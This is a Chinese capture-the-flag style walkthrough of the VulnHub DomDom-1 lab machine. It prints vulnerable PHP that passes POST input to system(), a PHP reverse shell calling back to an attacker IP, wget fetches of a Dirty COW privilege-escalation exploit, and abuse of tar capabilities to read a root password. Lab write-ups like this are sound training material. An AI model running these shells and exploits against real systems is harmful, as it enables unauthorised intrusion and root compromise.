Vulnhub DomDom-1

admin 2023年11月29日20:29:41评论9 views字数 2619阅读8分43秒阅读模式

 title: Vulnhub-DomDom-1

categories:
- VulnHub
tags:
- Linux
- nmap
- gobuster
- burpsuite
- 命令执行
- linux-exploit-suggester
- 脏牛
- tar
- PHP
cover: /images/Vulnhub.png
abbrlink: 8c9ce403
date: 2023-02-23 10:11:52

Vulnhub DomDom-1<!--more-->

0x01 靶机介绍

  • Name: DomDom: 1

  • Date release: 11 Jul 2019

  • Author: Avraham Cohen

  • Series: DomDom

靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/

0x02 侦查

端口探测

首先使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_domdom

Vulnhub DomDom-1

扫描结果显示目标开放了80端口

80端口

访问http://192.168.0.105为登录界面

Vulnhub DomDom-1

目录扫描

使用 gobuster 进行目录扫描,成功找到admin.php

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

Vulnhub DomDom-1

访问http://192.168.0.105/admin.php出现提示

Vulnhub DomDom-1

0x03 上线[www-data]

命令执行

填写用户名、密码后通过 BurpSuite 抓取登录数据包

Vulnhub DomDom-1

index.php修改为admin.php后发现 JavaScript 代码中可传递cmd参数

Vulnhub DomDom-1

利用cmd参数执行命令成功,说明存在命令执行漏洞

Vulnhub DomDom-1

反弹shell

本地监听6666端口

nc -nvlp 6666

反弹shell参考地址:

https://forum.ywhack.com/shell.php

通过 PHP 执行经 URL 编码后的反弹shell命令

php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

Vulnhub DomDom-1

成功拿到用户权限

python3 -c 'import pty;pty.spawn("/bin/bash")

Vulnhub DomDom-1

按ctrl+g退出监听,利用以下命令维持权限

stty raw -echonc -nvlp 6666

0x04 权限提升[root]

信息收集

查询操作系统版本

uname -a

Vulnhub DomDom-1

找到admin.php源码如下:

<html>        <head>                <title>                        DomDom                </title>        </head>        <body>
<?php if (isset($_POST['access'])) { ?> <form method="POST"> <input type="text" name="cmd" id="cmd" size="200"> <br> <br> <input type="submit" value="Execute"> </form> <pre> <?php if($_POST['cmd']) { system($_POST['cmd']); } ?> </pre> </body>
<script> document.getElementById("cmd").focus();</script>
<?php } else { echo "<h3>Welcome to DomDom !</h3><br>"; echo "<p>You need to know it's your actions that will show you the light.</p>"; echo "<br><br><br><br><br><br>"; echo "<br><br><br><br><br><br>"; echo "<br><br><br><br><br><br>"; echo "<br><br><br><br><br><br>"; echo "<p>Developed by [email protected] !</p>"; } ?> </body></html>
下载 linux-exploit-suggester 用于审计内核漏洞
git clone https://github.com/mzet-/linux-exploit-suggester.git
在本地开启 http 服务
python -m SimpleHTTPServer 80
通过 wget 下载 linux-exploit-suggester.sh 并赋予执行权限
wget http://192.168.0.106/linux-exploit-suggester.shchmod +x linux-exploit-suggester.sh

Vulnhub DomDom-1

执行脚本成功发现脏牛漏洞

./linux-exploit-suggester.sh

Vulnhub DomDom-1

脏牛提权

下载脏牛提权脚本并编译

wget https://www.exploit-db.com/download/40616mv 40616 cowroot.cgcc cowroot.c -o cowroot -pthread

Vulnhub DomDom-1

在本地开启 http 服务

python -m SimpleHTTPServer 80

下载利用程序cowroot

wget http://192.168.0.106/cowrootchmod +x cowroot./cowroot

执行后成功拿到root权限

Vulnhub DomDom-1

在管理员家目录下拿到Ry{}LJRBS5nc+*V.#a

Vulnhub DomDom-1

利用脏牛同样可在 Docker 中提权

git clone https://github.com/gebl/dirtycow-docker-vdso.git

上传利用脚本并编译

cd /dirtycow-vdso/make 

tar提权

列出指定目录及其子目录下所有文件的扩展属性,成功发现存在tar命令可忽略文件读及目录搜索的DAC访问限制

getcap -r / 2>/dev/null

Vulnhub DomDom-1

查询可登录用户只有www-data、domom、root

cat /etc/passwd | grep bash

Vulnhub DomDom-1

利用 tar 压缩用户domom目录,解压后在README.md中成功拿到 root 密码为Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

tar -cvf domom.tar /home/domomtar -xvf domom.tarcat README.md

Vulnhub DomDom-1

输入密码成功登录服务器

Vulnhub DomDom-1

Vulnhub DomDom-1

原文始发于微信公众号(狐狸说安全):Vulnhub DomDom-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月29日20:29:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub DomDom-1http://cn-sec.com/archives/2252217.html

发表评论

匿名网友 填写信息